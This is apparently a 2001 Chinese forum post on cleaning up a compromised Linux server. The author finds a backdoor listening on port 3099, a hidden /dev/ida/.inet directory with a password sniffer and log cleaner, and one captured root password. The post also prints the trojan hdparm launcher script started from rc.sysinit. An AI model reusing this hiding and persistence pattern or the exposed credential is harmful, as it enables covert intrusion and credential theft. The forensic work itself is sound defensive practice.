一次入侵检测经过
|
1#
发表于 2001-03-24 07:50
一次入侵检测经过
一次入侵检测经过
朋友主机遭到入侵。 superscan 扫描目标主机有开端口3099 以root身份登陆入侵主机 查看端口开放情况! [root@RredDhatT bin]# netstat -a Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 *:auth *:* LISTEN tcp 0 0 *:ftp *:* LISTEN tcp 0 0 *:telnet *:* LISTEN tcp 0 0 *:www *:* LISTEN ..... tcp 0 0 RredDhatT:7070 *:* LISTEN tcp 0 0 RredDhatT:554 *:* LISTEN tcp 0 0 *:3099 *:* LISTEN tcp 0 0 localhost:554 localhost:2869 TIME_WAIT Active UNIX domain sockets (including servers) Proto RefCnt Flags Type State I-Node Path unix 0 [ ] DGRAM 421 unix 0 [ ] DGRAM 433 u......... unix 0 [ ACC ] STREAM LISTENING 544 /tmp/.font-unix/fs-1 unix 6 [ ] DGRAM 411 /dev/log unix 0 [ ] STREAM CONNECTED 192 @00000018 发现开有未明端口3099 用ps -aux查看非法进程 [root@RredDhatT bin]# ps -aux USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND daemon 467 0.0 0.0 1144 104 ? S Mar 19 0:00 /usr/sbin/atd nobody 449 0.0 0.0 1284 164 ? S Mar 19 0:00 identd -e -o nobody 450 0.0 0.0 1284 164 ? S Mar 19 0:05 identd -e -o nobody 454 0.0 0.0 1284 164 ? S Mar 19 0:00 identd -e -o ...... root 6249 0.0 0.2 1940 1176 ? S 22:49 0:00 vi test root 6259 0.0 0.0 940 416 ? R 22:56 0:00 ps -aux root 16560 0.0 0.1 1212 572 ? S 21:58 0:00 in.telnetd: bbb root 16569 0.0 0.2 2228 1120 ? S 21:58 0:00 login -- vod root 16742 0.0 0.1 2156 948 ? S 21:58 0:00 su root 16775 0.0 0.1 1748 1000 ? S 21:58 0:00 bash vod 6170 0.0 0.1 1696 940 ? S 22:39 0:00 -bash vod 16673 0.0 0.1 1696 940 ? S 21:58 0:00 -bash xfs 572 0.0 0.0 2060 60 ? S Mar 19 0:00 xfs -droppriv -daemon -port -1 为发现异常。 用lsof查看(list open file) [root@RredDhatT /root]# /usr/sbin/lsof >test [root@RredDhatT /root]# vi test 或 grep 3099 * 查看test文件中是否包含3099字样! COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME test:sshdu 6224 root 3u IPv4 28244 TCP *:3099 (LISTEN) 找到执行程序!! 执行程序为sshdu 先杀了在说!! [root@RredDhatT /root]# kill 6224 确认3099关闭!! [root@RredDhatT /root]# netstat -a -n Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN ............ tcp 0 0 127.0.0.1:554 127.0.0.1:2894 TIME_WAIT raw 0 0 0.0.0.0:1 0.0.0.0:* Active UNIX domain sockets (including servers) Proto RefCnt Flags Type State I-Node Path unix 0 [ ] DGRAM 421 unix 0 [ ] DGRAM 433 unix 0 [ ] DGRAM 548 .......... unix 0 [ ACC ] STREAM LISTENING 544 /tmp/.font-unix/fs-1 unix 6 [ ] DGRAM 411 /dev/log unix 0 [ ] STREAM CONNECTED 192 @00000018 端口3099关闭!!! 查找sshdu位置! [root@RredDhatT /root]# locate sshdu /dev/ida/.inet/sshdu [root@RredDhatT ida]# ls *net -l ls: *net: No such file or directory 没有此目录!TNND!!! [root@RredDhatT ida]# cd .inet 可以进去!! [root@RredDhatT .inet]# ll total 768 -rwx------ 1 root root 7165 Sep 26 1983 linsniffer -rwx------ 1 root root 75 Sep 26 1983 logclear -rw-r--r-- 1 root root 5 Mar 24 06:42 pid -rw-r--r-- 1 root root 704 Feb 2 20:02 s -rwxr-xr-x 1 root root 4060 Sep 26 1983 sense -rwx------ 1 root root 8268 Sep 26 1983 sl2 -rw------- 1 root root 541 Sep 26 1983 ssh_host_key -rw------- 1 root root 512 Mar 24 06:42 ssh_random_seed -rwxr-xr-x 1 root root 686535 Dec 3 04:37 sshdu -rw-r--r-- 1 root root 47889 Mar 24 06:52 tcp.log [root@RredDhatT .inet]# cd .. [root@RredDhatT ida]# ls .inet -d -l drwxr-xr-x 2 root root 4096 Feb 14 11:43 .inet 建成时间为2.14,居然在人们约会的时候进来!!,高!!! [root@RredDhatT /root]# cd .inet [root@RredDhatT .inet]# more tcp.log 192.168.10.112 => server [21] USER root PASS adsdfa!@# PWD RETR /usr/local/Logs/rmaccess.log QUIT tcp.log中记录了所有登陆名字和密码以及command记录!!!! 查找从何处开始执行sshdu: [root@RredDhatT bin]# find /etc -type f -exec grep -s sshdu {} \; -print 没有结果!!! 继续!!!! [root@RredDhatT bin]# find /bin -type f -exec grep -s sshdu {} \; -print [root@RredDhatT bin]# find /sbin -type f -exec grep -s sshdu {} \; -print [root@RredDhatT bin]# find /usr -type f -exec grep -s sshdu {} \; -print ./sshdu -f ./s /usr/bin/hdparm 终于找到了宿主文件!! [root@RredDhatT bin]# cd /usr/bin/ [root@RredDhatT bin]# ls hd* -l -r-x------ 1 root root 76 Nov 12 06:01 hdparm [root@RredDhatT bin]# more hdparm #!/bin/sh cd /dev/ida/.inet ./sshdu -f ./s ./linsniffer >> ./tcp.log & cd / [root@RredDhatT bin]# 在/etc目录中找hdparm: [root@RredDhatT bin]# find /etc -type f -exec grep -s hdparm {} \; -print /usr/bin/hdparm -t1 -X53 -p /etc/rc.d/rc.sysinit 找到源头!!! [root@RredDhatT /root]# vi /etc/rc.d/rc.sysinit #/usr/bin/hdparm -t1 -X53 -p reboot! 搞到一个sniffer的好东东!!! |